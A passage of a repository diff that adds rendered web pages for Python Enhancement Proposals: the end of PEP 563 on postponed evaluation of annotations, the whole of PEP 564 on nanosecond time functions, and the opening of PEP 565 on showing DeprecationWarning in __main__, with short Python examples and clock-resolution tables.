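+# the string form is unparsed from the AST, so the odd spacing is normalized,
+# and the already-quoted annotation is wrapped in a string once more
+assert f.__annotations__ == {'x': 'int', 'y': "'int'", 'return': 'None'}
+
+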

Annotations need to be syntactically valid Python expressions, including when passed as literal strings (i.e. compile(literal, '', 'eval')). Annotations can only use names present in the module scope, as postponed evaluation using local names is not reliable (with the sole exception of class-level names resolved by typing.get_type_hints()).

+

Note that as per PEP 526, local variable annotations are not evaluated +at all since they are not accessible outside of the function’s closure.

+
+

Enabling the future behavior in Python 3.7

+

The functionality described above can be enabled starting from Python +3.7 using the following special import:

+
from __future__ import annotations
+
+
+

A reference implementation of this functionality is available +on GitHub.

+
+
+
+

Resolving Type Hints at Runtime

+

To resolve an annotation at runtime from its string form to the result +of the enclosed expression, user code needs to evaluate the string.

+

For code that uses type hints, the typing.get_type_hints(obj, globalns=None, localns=None) function correctly evaluates expressions back from their string form. Note that all valid code currently using __annotations__ should already be doing that, since a type annotation can be expressed as a string literal.

+

For code which uses annotations for other purposes, a regular +eval(ann, globals, locals) call is enough to resolve the +annotation.

+
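
A minimal sketch (hypothetical names) of resolving such an annotation with eval(), using the defining module's globals:

+
from __future__ import annotations
+
+def process(units: UnitRegistry) -> None: ...  # forward reference is fine here
+
+class UnitRegistry: ...
+
+ann = process.__annotations__['units']     # the string 'UnitRegistry'
+resolved = eval(ann, process.__globals__)  # evaluate it in the defining module
+assert resolved is UnitRegistry
+
+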

In both cases it’s important to consider how globals and locals affect +the postponed evaluation. An annotation is no longer evaluated at the +time of definition and, more importantly, in the same scope where it +was defined. Consequently, using local state in annotations is no +longer possible in general. As for globals, the module where the +annotation was defined is the correct context for postponed evaluation.

+

The get_type_hints() function automatically resolves the correct +value of globalns for functions and classes. It also automatically +provides the correct localns for classes.

+

When running eval(), +the value of globals can be gathered in the following way:

+
    +
  • function objects hold a reference to their respective globals in an +attribute called __globals__;
  • +
  • classes hold the name of the module they were defined in, this can be +used to retrieve the respective globals:
    cls_globals = vars(sys.modules[SomeClass.__module__])
    +
    +
    +

    Note that this needs to be repeated for base classes to evaluate all +__annotations__.

    +
  • +
  • modules should use their own __dict__.
  • +
+

The value of localns cannot be reliably retrieved for functions +because in all likelihood the stack frame at the time of the call no +longer exists.

+

For classes, localns can be composed by chaining vars of the given +class and its base classes (in the method resolution order). Since slots +can only be filled after the class was defined, we don’t need to consult +them for this purpose.

+
+
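
A sketch of composing such a localns (collections.ChainMap is used purely for brevity; earlier entries in the MRO take priority):

+
from collections import ChainMap
+
+def class_localns(cls):
+    # chain the namespaces of the class and its bases, in method resolution order
+    return dict(ChainMap(*(vars(base) for base in cls.__mro__)))
+
+class Base:
+    x = 1
+
+class Derived(Base):
+    y = 2
+
+assert class_localns(Derived)['x'] == 1
+
+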

Runtime annotation resolution and class decorators

+

Metaclasses and class decorators that need to resolve annotations for +the current class will fail for annotations that use the name of the +current class. Example:

+
def class_decorator(cls):
+    annotations = get_type_hints(cls)  # raises NameError on 'C'
+    print(f'Annotations for {cls}: {annotations}')
+    return cls
+
+@class_decorator
+class C:
+    singleton: 'C' = None
+
+
+

This was already true before this PEP. The class decorator acts on +the class before it’s assigned a name in the current definition scope.

+
+
+

Runtime annotation resolution and TYPE_CHECKING

+

Sometimes there’s code that must be seen by a type checker but should +not be executed. For such situations the typing module defines a +constant, TYPE_CHECKING, that is considered True during type +checking but False at runtime. Example:

+
import typing
+
+if typing.TYPE_CHECKING:
+    import expensive_mod
+
+def a_func(arg: expensive_mod.SomeClass) -> None:
+    a_var: expensive_mod.SomeClass = arg
+    ...
+
+
+

This approach is also useful when handling import cycles.

+

Trying to resolve annotations of a_func at runtime using typing.get_type_hints() will fail since the name expensive_mod is not defined (the TYPE_CHECKING variable being False at runtime). This was already true before this PEP.

+
+
+
+

Backwards Compatibility

+

This is a backwards incompatible change. Applications depending on +arbitrary objects to be directly present in annotations will break +if they are not using typing.get_type_hints() or eval().

+

Annotations that depend on locals at the time of the function +definition will not be resolvable later. Example:

+
def generate():
+    A = Optional[int]
+    class C:
+        field: A = 1
+        def method(self, arg: A) -> None: ...
+    return C
+X = generate()
+
+
+

Trying to resolve annotations of X later by using get_type_hints(X) will fail because A and its enclosing scope no longer exist. Python will make no attempt to disallow such annotations since they can often still be successfully statically analyzed, which is the predominant use case for annotations.

+

Annotations using nested classes and their respective state are still +valid. They can use local names or the fully qualified name. Example:

+
class C:
+    field = 'c_field'
+    def method(self) -> C.field:  # this is OK
+        ...
+
+    def method(self) -> field:  # this is OK
+        ...
+
+    def method(self) -> C.D:  # this is OK
+        ...
+
+    def method(self) -> D:  # this is OK
+        ...
+
+    class D:
+        field2 = 'd_field'
+        def method(self) -> C.D.field2:  # this is OK
+            ...
+
+        def method(self) -> D.field2:  # this FAILS, class D is local to C
+            ...                        # and is therefore only available
+                                       # as C.D. This was already true
+                                       # before the PEP.
+
+        def method(self) -> field2:  # this is OK
+            ...
+
+        def method(self) -> field:  # this FAILS, field is local to C and
+                                    # is therefore not visible to D unless
+                                    # accessed as C.field. This was already
+                                    # true before the PEP.
+
+
+

In the presence of an annotation that isn’t a syntactically valid +expression, SyntaxError is raised at compile time. However, since names +aren’t resolved at that time, no attempt is made to validate whether +used names are correct or not.

+
+

Deprecation policy

+

Starting with Python 3.7, a __future__ import is required to use the +described functionality. No warnings are raised.

+

NOTE: Whether this will eventually become the default behavior is currently unclear +pending decision on PEP 649. In any case, use of annotations that depend upon +their eager evaluation is incompatible with both proposals and is no longer +supported.

+
+
+
+

Forward References

+

Deliberately using a name before it was defined in the module is called a forward reference. For the purpose of this section, we'll call any name imported or defined within an if TYPE_CHECKING: block a forward reference, too.

+

This PEP addresses the issue of forward references in type annotations. +The use of string literals will no longer be required in this case. +However, there are APIs in the typing module that use other syntactic +constructs of the language, and those will still require working around +forward references with string literals. The list includes:

+
    +
  • type definitions:
    T = TypeVar('T', bound='<type>')
    +UserId = NewType('UserId', '<type>')
    +Employee = NamedTuple('Employee', [('name', '<type>'), ('id', '<type>')])
    +
    +
    +
  • +
  • aliases:
    Alias = Optional['<type>']
    +AnotherAlias = Union['<type>', '<type>']
    +YetAnotherAlias = '<type>'
    +
    +
    +
  • +
  • casting:
    cast('<type>', value)
    +
    +
    +
  • +
  • base classes:
    class C(Tuple['<type>', '<type>']): ...
    +
    +
    +
  • +
+

Depending on the specific case, some of the cases listed above might be +worked around by placing the usage in a if TYPE_CHECKING: block. +This will not work for any code that needs to be available at runtime, +notably for base classes and casting. For named tuples, using the new +class definition syntax introduced in Python 3.6 solves the issue.

+

In general, fixing the issue for all forward references requires +changing how module instantiation is performed in Python, from the +current single-pass top-down model. This would be a major change in the +language and is out of scope for this PEP.

+
+
+

Rejected Ideas

+
+

Keeping the ability to use function local state when defining annotations

+

With postponed evaluation, this would require keeping a reference to +the frame in which an annotation got created. This could be achieved +for example by storing all annotations as lambdas instead of strings.

+

This would be prohibitively expensive for highly annotated code as the +frames would keep all their objects alive. That includes predominantly +objects that won’t ever be accessed again.

+

To be able to address class-level scope, the lambda approach would require a new kind of cell in the interpreter. This would proliferate the number of types that can appear in __annotations__, and wouldn't be as introspectable as strings.

+

Note that in the case of nested classes, the functionality to get the +effective “globals” and “locals” at definition time is provided by +typing.get_type_hints().

+

If a function generates a class or a function with annotations that +have to use local variables, it can populate the given generated +object’s __annotations__ dictionary directly, without relying on +the compiler.

+
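
A sketch of that direct population (assuming Optional is imported from typing):

+
from typing import Optional
+
+def generate():
+    A = Optional[int]
+    class C:
+        def method(self, arg): ...
+    # store the actual objects, bypassing the compiler's string form
+    C.method.__annotations__ = {'arg': A, 'return': None}
+    return C
+
+X = generate()
+assert X.method.__annotations__['arg'] == Optional[int]
+
+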
+
+

Disallowing local state usage for classes, too

+

This PEP originally proposed limiting names within annotations to only allow names from the module-level scope, including for classes. The author argued this makes name resolution unambiguous, including in cases of conflicts between local names and module-level names.

+

This idea was ultimately rejected in the case of classes. Instead, typing.get_type_hints() got modified to populate the local namespace correctly if class-level annotations are needed.

+

The reasons for rejecting the idea were that it goes against the +intuition of how scoping works in Python, and would break enough +existing type annotations to make the transition cumbersome. Finally, +local scope access is required for class decorators to be able to +evaluate type annotations. This is because class decorators are applied +before the class receives its name in the outer scope.

+
+
+

Introducing a new dictionary for the string literal form instead

+

Yury Selivanov shared the following idea:

+
    +
  1. Add a new special attribute to functions: __annotations_text__.
  2. Make __annotations__ a lazy dynamic mapping, evaluating expressions from the corresponding key in __annotations_text__ just-in-time.
+

This idea is supposed to solve the backwards compatibility issue, removing the need for a new __future__ import. Sadly, this is not enough. Postponed evaluation changes which state the annotation has access to. While postponed evaluation fixes the forward reference problem, it also makes it impossible to access function-level locals. This alone is a source of backwards incompatibility which justifies a deprecation period.

+

A __future__ import is an obvious and explicit indicator of opting in for the new functionality. It also makes it trivial for external tools to recognize the difference between a Python file using the old or the new approach. In the former case, such a tool would recognize that local state access is allowed, whereas in the latter case it would recognize that forward references are allowed.

+

Finally, just-in-time evaluation in __annotations__ is an +unnecessary step if get_type_hints() is used later.

+
+
+

Dropping annotations with -O

+

There are two reasons this is not satisfying for the purpose of this +PEP.

+

First, this only addresses runtime cost, not forward references, which still cannot be safely used in source code. A library maintainer would never be able to use forward references since that would force the library users to use this new hypothetical -O switch.

+

Second, this throws the baby out with the bath water. Now no runtime +annotation use can be performed. PEP 557 is one example of a recent +development where evaluating type annotations at runtime is useful.

+

All that being said, a granular -O option to drop annotations is +a possibility in the future, as it’s conceptually compatible with +existing -O behavior (dropping docstrings and assert statements). This +PEP does not invalidate the idea.

+
+
+

Passing string literals in annotations verbatim to __annotations__

+

This PEP originally suggested directly storing the contents of a string +literal under its respective key in __annotations__. This was +meant to simplify support for runtime type checkers.

+

Mark Shannon pointed out this idea was flawed since it wasn’t handling +situations where strings are only part of a type annotation.

+

The inconsistency of this approach was always apparent, and given that it doesn't fully prevent cases of double-wrapping strings anyway, it is not worth it.

+
+
+

Making the name of the future import more verbose

+

Instead of requiring the following import:

+
from __future__ import annotations
+
+
+

the PEP could call the feature more explicitly, for example +string_annotations, stringify_annotations, +annotation_strings, annotations_as_strings, lazy_annotations, +static_annotations, etc.

+

The problem with those names is that they are very verbose. Each of +them besides lazy_annotations would constitute the longest future +feature name in Python. They are long to type and harder to remember +than the single-word form.

+

There is precedent for a future import name that sounds overly generic but in practice was obvious to users as to what it does:

+
from __future__ import division
+
+
+
+
+
+

Prior discussion

+
+

In PEP 484

+

The forward reference problem was discussed when PEP 484 was originally +drafted, leading to the following statement in the document:

+
+
A compromise is possible where a __future__ import could enable +turning all annotations in a given module into string literals, as +follows:
from __future__ import annotations
+
+class ImSet:
+    def add(self, a: ImSet) -> List[ImSet]: ...
+
+assert ImSet.add.__annotations__ == {
+    'a': 'ImSet', 'return': 'List[ImSet]'
+}
+
+
+

Such a __future__ import statement may be proposed in a separate +PEP.

+
+
+
+

python/typing#400

+

The problem was discussed at length on the typing module’s GitHub +project, under Issue 400. +The problem statement there includes critique of generic types requiring +imports from typing. This tends to be confusing to +beginners:

+
+
Why this:
from typing import List, Set
+def dir(o: object = ...) -> List[str]: ...
+def add_friends(friends: Set[Friend]) -> None: ...
+
+
+

But not this:

+
def dir(o: object = ...) -> list[str]: ...
+def add_friends(friends: set[Friend]) -> None: ...
+
+
+

Why this:

+
up_to_ten = list(range(10))
+friends = set()
+
+
+

But not this:

+
from typing import List, Set
+up_to_ten = List[int](range(10))
+friends = Set[Friend]()
+
+
+
+

While typing usability is an interesting problem, it is out of scope +of this PEP. Specifically, any extensions of the typing syntax +standardized in PEP 484 will require their own respective PEPs and +approval.

+

Issue 400 ultimately suggests postponing evaluation of annotations and +keeping them as strings in __annotations__, just like this PEP +specifies. This idea was received well. Ivan Levkivskyi supported +using the __future__ import and suggested unparsing the AST in +compile.c. Jukka Lehtosalo pointed out that there are some cases +of forward references where types are used outside of annotations and +postponed evaluation will not help those. For those cases using the +string literal notation would still be required. Those cases are +discussed briefly in the “Forward References” section of this PEP.

+

The biggest controversy on the issue was Guido van Rossum’s concern +that untokenizing annotation expressions back to their string form has +no precedent in the Python programming language and feels like a hacky +workaround. He said:

+
+
One thing that comes to mind is that it’s a very random change to +the language. It might be useful to have a more compact way to +indicate deferred execution of expressions (using less syntax than +lambda:). But why would the use case of type annotations be so +all-important to change the language to do it there first (rather +than proposing a more general solution), given that there’s already +a solution for this particular use case that requires very minimal +syntax?
+

Eventually, Ethan Smith and schollii voiced that feedback gathered +during PyCon US suggests that the state of forward references needs +fixing. Guido van Rossum suggested coming back to the __future__ +idea, pointing out that to prevent abuse, it’s important for the +annotations to be kept both syntactically valid and evaluating correctly +at runtime.

+
+
+

First draft discussion on python-ideas

+

Discussion happened largely in two threads, the original announcement +and a follow-up called PEP 563 and expensive backwards compatibility.

+

The PEP received rather warm feedback (4 strongly in favor, 2 in favor with concerns, 2 against). The biggest voice of concern on the former thread was Steven D’Aprano’s review, stating that the problem definition of the PEP doesn’t justify breaking backwards compatibility. In this response Steven seemed mostly concerned about Python no longer supporting evaluation of annotations that depended on local function/class state.

+

A few people voiced concerns that there are libraries using annotations +for non-typing purposes. However, none of the named libraries would be +invalidated by this PEP. They do require adapting to the new +requirement to call eval() on the annotation with the correct +globals and locals set.

+

This detail about globals and locals having to be correct was picked up by a number of commenters. Alyssa (Nick) Coghlan benchmarked turning annotations into lambdas instead of strings; sadly, this proved to be much slower at runtime than the current situation.

+

The latter thread was started by Jim J. Jewett who stressed that +the ability to properly evaluate annotations is an important requirement +and backwards compatibility in that regard is valuable. After some +discussion he admitted that side effects in annotations are a code smell +and modal support to either perform or not perform evaluation is +a messy solution. His biggest concern remained loss of functionality +stemming from the evaluation restrictions on global and local scope.

+

Alyssa Coghlan pointed out that some of those evaluation restrictions from +the PEP could be lifted by a clever implementation of an evaluation +helper, which could solve self-referencing classes even in the form of a +class decorator. She suggested the PEP should provide this helper +function in the standard library.

+
+
+

Second draft discussion on python-dev

+

Discussion happened mainly in the announcement thread, +followed by a brief discussion under Mark Shannon’s post.

+

Steven D’Aprano was concerned whether it’s acceptable for typos to be +allowed in annotations after the change proposed by the PEP. Brett +Cannon responded that type checkers and other static analyzers (like +linters or programming text editors) will catch this type of error. +Jukka Lehtosalo added that this situation is analogous to how names in +function bodies are not resolved until the function is called.

+

A major topic of discussion was Alyssa Coghlan’s suggestion to store annotations in “thunk form”, in other words as a specialized lambda which would be able to access class-level scope (and allow for scope customization at call time). She presented a possible design for it (indirect attribute cells). This was later seen as equivalent to “special forms” in Lisp. Guido van Rossum expressed worry that this sort of feature cannot be safely implemented in twelve weeks (i.e. in time before the Python 3.7 beta freeze).

+

After a while it became clear that the point of division between +supporters of the string form vs. supporters of the thunk form is +actually about whether annotations should be perceived as a general +syntactic element vs. something tied to the type checking use case.

+

Finally, Guido van Rossum declared he’s rejecting the thunk idea +based on the fact that it would require a new building block in the +interpreter. This block would be exposed in annotations, multiplying +possible types of values stored in __annotations__ (arbitrary +objects, strings, and now thunks). Moreover, thunks aren’t as +introspectable as strings. Most importantly, Guido van Rossum +explicitly stated interest in gradually restricting the use of +annotations to static typing (with an optional runtime component).

+

Alyssa Coghlan was eventually convinced by PEP 563, too, and promptly began the mandatory bikeshedding session on the name of the __future__ import. Many debaters agreed that annotations seemed like an overly broad name for the feature. Guido van Rossum briefly decided to call it string_annotations but then changed his mind, arguing that division is a precedent of a broad name with a clear meaning.

+

The final improvement to the PEP suggested in the discussion by Mark +Shannon was the rejection of the temptation to pass string literals +through to __annotations__ verbatim.

+

A side-thread of discussion started around the runtime penalty of static typing, with topics like the import time of the typing module (which is comparable to re without dependencies, and three times as heavy as re when counting dependencies).

+
+
+
+

Acknowledgements

+

This document could not be completed without valuable input, +encouragement and advice from Guido van Rossum, Jukka Lehtosalo, and +Ivan Levkivskyi.

+

The implementation was thoroughly reviewed by Serhiy Storchaka who +found all sorts of issues, including bugs, bad readability, and +performance problems.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0563.rst

+

Last modified: 2024-03-24 01:43:58 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0564/index.html b/pep-0564/index.html new file mode 100644 index 00000000000..1521d047661 --- /dev/null +++ b/pep-0564/index.html @@ -0,0 +1,623 @@ + + + + + + + + PEP 564 – Add new time functions with nanosecond resolution | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 564 – Add new time functions with nanosecond resolution

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Oct-2017
+
Python-Version:
+
3.7
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add six new “nanosecond” variants of existing functions to the time +module: clock_gettime_ns(), clock_settime_ns(), +monotonic_ns(), perf_counter_ns(), process_time_ns() and +time_ns(). While similar to the existing functions without the +_ns suffix, they provide nanosecond resolution: they return a number of +nanoseconds as a Python int.

+

The time.time_ns() resolution is 3 times better than the time.time() +resolution on Linux and Windows.

+
+
+

Rationale

+
+

Float type limited to 104 days

+

The clock resolution of desktop and laptop computers is getting closer to nanosecond resolution. More and more clocks have a frequency in MHz, up to GHz for the CPU TSC clock.

+

The Python time.time() function returns the current time as a +floating-point number which is usually a 64-bit binary floating-point +number (in the IEEE 754 format).

+

The problem is that the float type starts to lose nanoseconds after 104 +days. Converting from nanoseconds (int) to seconds (float) and +then back to nanoseconds (int) to check if conversions lose +precision:

+
# no precision loss
+>>> x = 2 ** 52 + 1; int(float(x * 1e-9) * 1e9) - x
+0
+# precision loss! (1 nanosecond)
+>>> x = 2 ** 53 + 1; int(float(x * 1e-9) * 1e9) - x
+-1
+>>> print(datetime.timedelta(seconds=2 ** 53 / 1e9))
+104 days, 5:59:59.254741
+
+
+

time.time() returns seconds elapsed since the UNIX epoch: January +1st, 1970. This function hasn’t had nanosecond precision since May 1970 +(47 years ago):

+
>>> import datetime
+>>> unix_epoch = datetime.datetime(1970, 1, 1)
+>>> print(unix_epoch + datetime.timedelta(seconds=2**53 / 1e9))
+1970-04-15 05:59:59.254741
+
+
+
+
+

Previous rejected PEP

+

Five years ago, PEP 410 proposed a large and complex change in all Python functions returning time to support nanosecond resolution using the decimal.Decimal type.

+

The PEP was rejected for different reasons:

+
    +
  • The idea of adding a new optional parameter to change the result type +was rejected. It’s an uncommon (and bad?) programming practice in +Python.
  • +
  • It was not clear if hardware clocks really had a resolution of 1 +nanosecond, or if that made sense at the Python level.
  • +
  • The decimal.Decimal type is uncommon in Python and so requires adapting code to handle it.
  • +
+
+
+

Issues caused by precision loss

+
+

Example 1: measure time delta in long-running process

+

A server is running for longer than 104 days. A clock is read before and after running a function to measure its performance to detect performance issues at runtime. Such a benchmark only loses precision because of the float type used by clocks, not because of the clock resolution.

+

On Python microbenchmarks, it is common to see function calls taking +less than 100 ns. A difference of a few nanoseconds might become +significant.

+
+
+

Example 2: compare times with different resolution

+

Two programs “A” and “B” are running on the same system and use the system clock. Program A reads the system clock with nanosecond resolution and writes a timestamp with nanosecond resolution. Program B reads the timestamp with nanosecond resolution, but compares it to the system clock read with a worse resolution. To simplify the example, let’s say that B reads the clock with second resolution. In that case, there is a window of 1 second during which program B can see the timestamp written by A as “in the future”.

+

Nowadays, more and more databases and filesystems support storing times +with nanosecond resolution.

+
+

Note

+

This issue was already fixed for file modification time by adding the +st_mtime_ns field to the os.stat() result, and by accepting +nanoseconds in os.utime(). This PEP proposes to generalize the +fix.

+
+
+
+
+

CPython enhancements of the last 5 years

+

Since PEP 410 was rejected:

+
    +
  • The os.stat_result structure got 3 new fields for timestamps as +nanoseconds (Python int): st_atime_ns, st_ctime_ns +and st_mtime_ns.
  • +
  • The PEP 418 was accepted, Python 3.3 got 3 new clocks: +time.monotonic(), time.perf_counter() and +time.process_time().
  • +
  • The CPython private “pytime” C API handling time now uses a new +_PyTime_t type: simple 64-bit signed integer (C int64_t). +The _PyTime_t unit is an implementation detail and not part of the +API. The unit is currently 1 nanosecond.
  • +
+
+
+

Existing Python APIs using nanoseconds as int

+

The os.stat_result structure has 3 fields for timestamps as +nanoseconds (int): st_atime_ns, st_ctime_ns and +st_mtime_ns.

+

The ns parameter of the os.utime() function accepts a +(atime_ns: int, mtime_ns: int) tuple: nanoseconds.

+
+
+
+

Changes

+
+

New functions

+

This PEP adds six new functions to the time module:

+
    +
  • time.clock_gettime_ns(clock_id)
  • +
  • time.clock_settime_ns(clock_id, time: int)
  • +
  • time.monotonic_ns()
  • +
  • time.perf_counter_ns()
  • +
  • time.process_time_ns()
  • +
  • time.time_ns()
  • +
+

These functions are similar to the versions without the _ns suffix, but return a number of nanoseconds as a Python int.

+

For example, time.monotonic_ns() == int(time.monotonic() * 1e9) if the monotonic() value is small enough to not lose precision.

+
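
A quick sketch of using one of the new functions; since the _ns variants return plain Python ints, differences are exact:

+
import time
+
+t1 = time.perf_counter_ns()
+sum(range(10 ** 6))  # code under measurement
+t2 = time.perf_counter_ns()
+
+dt = t2 - t1  # exact integer arithmetic, no float rounding
+print("elapsed: %d ns" % dt)
+
+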

These functions are needed because they may return “large” timestamps, +like time.time() which uses the UNIX epoch as reference, and so their +float-returning variants are likely to lose precision at the nanosecond +resolution.

+
+
+

Unchanged functions

+

Since the time.clock() function was deprecated in Python 3.3, no +time.clock_ns() is added.

+

Python has other time-returning functions. No nanosecond variant is proposed for these other functions, either because their internal resolution is greater than or equal to 1 us, or because their maximum value is small enough to not lose precision. For example, the maximum value of time.clock_getres() should be 1 second.

+

Examples of unchanged functions:

+
    +
  • os module: sched_rr_get_interval(), times(), wait3() +and wait4()
  • +
  • resource module: ru_utime and ru_stime fields of +getrusage()
  • +
  • signal module: getitimer(), setitimer()
  • +
  • time module: clock_getres()
  • +
+

See also the Annex: Clocks Resolution in Python.

+

A new nanosecond-returning flavor of these functions may be added later +if an operating system exposes new functions providing better resolution.

+
+
+
+

Alternatives and discussion

+
+

Sub-nanosecond resolution

+

The time.time_ns() API is not theoretically future-proof: if clock resolutions continue to increase below the nanosecond level, new Python functions may be needed.

+

In practice, the 1 nanosecond resolution is currently enough for all +structures returned by all common operating systems functions.

+

Hardware clocks with a resolution better than 1 nanosecond already exist. For example, the frequency of a CPU TSC clock is the CPU base frequency: the resolution is around 0.3 ns for a CPU running at 3 GHz. Users who have access to such hardware and really need sub-nanosecond resolution can however extend Python for their needs. Such a rare use case doesn’t justify designing the Python standard library to support sub-nanosecond resolution.

+

For the CPython implementation, nanosecond resolution is convenient: the +standard and well supported int64_t type can be used to store a +nanosecond-precise timestamp. It supports a timespan of -292 years +to +292 years. Using the UNIX epoch as reference, it therefore supports +representing times since year 1677 to year 2262:

+
>>> 1970 - 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
+1677.728976954687
+>>> 1970 + 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
+2262.271023045313
+
+
+
+
+

Modifying time.time() result type

+

It was proposed to modify time.time() to return a different number +type with better precision.

+

The PEP 410 proposed to return decimal.Decimal which already exists and +supports arbitrary precision, but it was rejected. Apart from +decimal.Decimal, no portable real number type with better precision +is currently available in Python.

+

Changing the built-in Python float type is out of the scope of this +PEP.

+

Moreover, changing existing functions to return a new type introduces a +risk of breaking the backward compatibility even if the new type is +designed carefully.

+
+
+

Different types

+

Many ideas of new types were proposed to support larger or arbitrary precision: fractions, structures or 2-tuples using integers, fixed-point numbers, etc.

+

See also the PEP 410 for a previous long discussion on other types.

+

Adding a new type requires more effort to support it than reusing the existing int type. The standard library, third party code and applications would have to be modified to support it.

+

The Python int type is well known, well supported, easy to +manipulate, and supports all arithmetic operations such as +dt = t2 - t1.

+

Moreover, taking/returning an integer number of nanoseconds is not a +new concept in Python, as witnessed by os.stat_result and +os.utime(ns=(atime_ns, mtime_ns)).

+
+

Note

+

If the Python float type becomes larger (e.g. decimal128 or +float128), the time.time() precision will increase as well.

+
+
+
+

Different API

+

The time.time(ns=False) API was proposed to avoid adding new +functions. It’s an uncommon (and bad?) programming practice in Python to +change the result type depending on a parameter.

+

Different options were proposed to allow the user to choose the time +resolution. If each Python module uses a different resolution, it can +become difficult to handle different resolutions, instead of just +seconds (time.time() returning float) and nanoseconds +(time.time_ns() returning int). Moreover, as written above, +there is no need for resolution better than 1 nanosecond in practice in +the Python standard library.

+
+
+

A new module

+

It was proposed to add a new time_ns module containing the following +functions:

+
    +
  • time_ns.clock_gettime(clock_id)
  • +
  • time_ns.clock_settime(clock_id, time: int)
  • +
  • time_ns.monotonic()
  • +
  • time_ns.perf_counter()
  • +
  • time_ns.process_time()
  • +
  • time_ns.time()
  • +
+

The first question is whether the time_ns module should expose exactly the same API (constants, functions, etc.) as the time module. It can be painful to maintain two flavors of the time module. How are users supposed to choose between these two modules?

+

If tomorrow, other nanosecond variants are needed in the os module, +will we have to add a new os_ns module as well? There are functions +related to time in many modules: time, os, signal, +resource, select, etc.

+

Another idea is to add a time.ns submodule or a nested namespace to get the time.ns.time() syntax, but it suffers from the same issues.

+
+
+
+

Annex: Clocks Resolution in Python

+

This annex contains the resolution of clocks as measured in Python, and +not the resolution announced by the operating system or the resolution of +the internal structure used by the operating system.

+
+

Script

+

Example of a script to measure the smallest difference between two time.time() and time.time_ns() reads, ignoring differences of zero:

+
import math
+import time
+
+LOOPS = 10 ** 6
+
+print("time.time_ns(): %s" % time.time_ns())
+print("time.time(): %s" % time.time())
+
+min_dt = [abs(time.time_ns() - time.time_ns())
+          for _ in range(LOOPS)]
+min_dt = min(filter(bool, min_dt))
+print("min time_ns() delta: %s ns" % min_dt)
+
+min_dt = [abs(time.time() - time.time())
+          for _ in range(LOOPS)]
+min_dt = min(filter(bool, min_dt))
+print("min time() delta: %s ns" % math.ceil(min_dt * 1e9))
+
+
+
+
+

Linux

+

Clocks resolution measured in Python on Fedora 26 (kernel 4.12):

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Function                Resolution
clock()                 1 us
monotonic()             81 ns
monotonic_ns()          84 ns
perf_counter()          82 ns
perf_counter_ns()       84 ns
process_time()          2 ns
process_time_ns()       1 ns
resource.getrusage()    1 us
time()                  239 ns
time_ns()               84 ns
times().elapsed         10 ms
times().user            10 ms
+

Notes on resolutions:

+
    +
  • clock() frequency is CLOCKS_PER_SECOND which is 1,000,000 Hz +(1 MHz): resolution of 1 us.
  • +
  • times() frequency is os.sysconf("SC_CLK_TCK") (or the HZ +constant) which is equal to 100 Hz: resolution of 10 ms.
  • +
  • resource.getrusage(), os.wait3() and os.wait4() use the +ru_usage structure. The type of the ru_usage.ru_utime and +ru_usage.ru_stime fields is the timeval structure which has a +resolution of 1 us.
  • +
+
+
+

Windows

+

Clocks resolution measured in Python on Windows 8.1:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Function                Resolution
monotonic()             15 ms
monotonic_ns()          15 ms
perf_counter()          100 ns
perf_counter_ns()       100 ns
process_time()          15.6 ms
process_time_ns()       15.6 ms
time()                  894.1 us
time_ns()               318 us
+

The frequency of perf_counter() and perf_counter_ns() comes from +QueryPerformanceFrequency(). The frequency is usually 10 MHz: resolution of +100 ns. In old Windows versions, the frequency was sometimes 3,579,545 Hz (3.6 +MHz): resolution of 279 ns.

+
+
+

Analysis

+

The resolution of time.time_ns() is much better than +time.time(): 84 ns (2.8x better) vs 239 ns on Linux and 318 us +(2.8x better) vs 894 us on Windows. The time.time() resolution will +only become larger (worse) as years pass since every day adds +86,400,000,000,000 nanoseconds to the system clock, which increases the +precision loss.

+

The difference between time.perf_counter(), time.monotonic(), +time.process_time() and their respective nanosecond variants is +not visible in this quick script since the script runs for less than 1 +minute, and the uptime of the computer used to run the script was +smaller than 1 week. A significant difference may be seen if uptime +reaches 104 days or more.

+

resource.getrusage() and times() have a resolution greater than or equal to 1 microsecond, and so don’t need a variant with nanosecond resolution.

+
+

Note

+

Internally, Python starts the monotonic() and perf_counter() clocks at zero on some platforms, which indirectly reduces the precision loss.

+
+
+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0564.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0565/index.html b/pep-0565/index.html new file mode 100644 index 00000000000..817851c6d29 --- /dev/null +++ b/pep-0565/index.html @@ -0,0 +1,478 @@ + + + + + + + + PEP 565 – Show DeprecationWarning in __main__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 565 – Show DeprecationWarning in __main__

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Nov-2017
+
Python-Version:
+
3.7
+
Post-History:
+
12-Nov-2017, 25-Nov-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

In Python 2.7 and Python 3.2, the default warning filters were updated to hide +DeprecationWarning by default, such that deprecation warnings in development +tools that were themselves written in Python (e.g. linters, static analysers, +test runners, code generators), as well as any other applications that merely +happened to be written in Python, wouldn’t be visible to their users unless +those users explicitly opted in to seeing them.

+

However, this change has had the unfortunate side effect of making +DeprecationWarning markedly less effective at its primary intended purpose: +providing advance notice of breaking changes in APIs (whether in CPython, the +standard library, or in third party libraries) to users of those APIs.

+

To improve this situation, this PEP proposes a single adjustment to the +default warnings filter: displaying deprecation warnings attributed to the main +module by default.

+

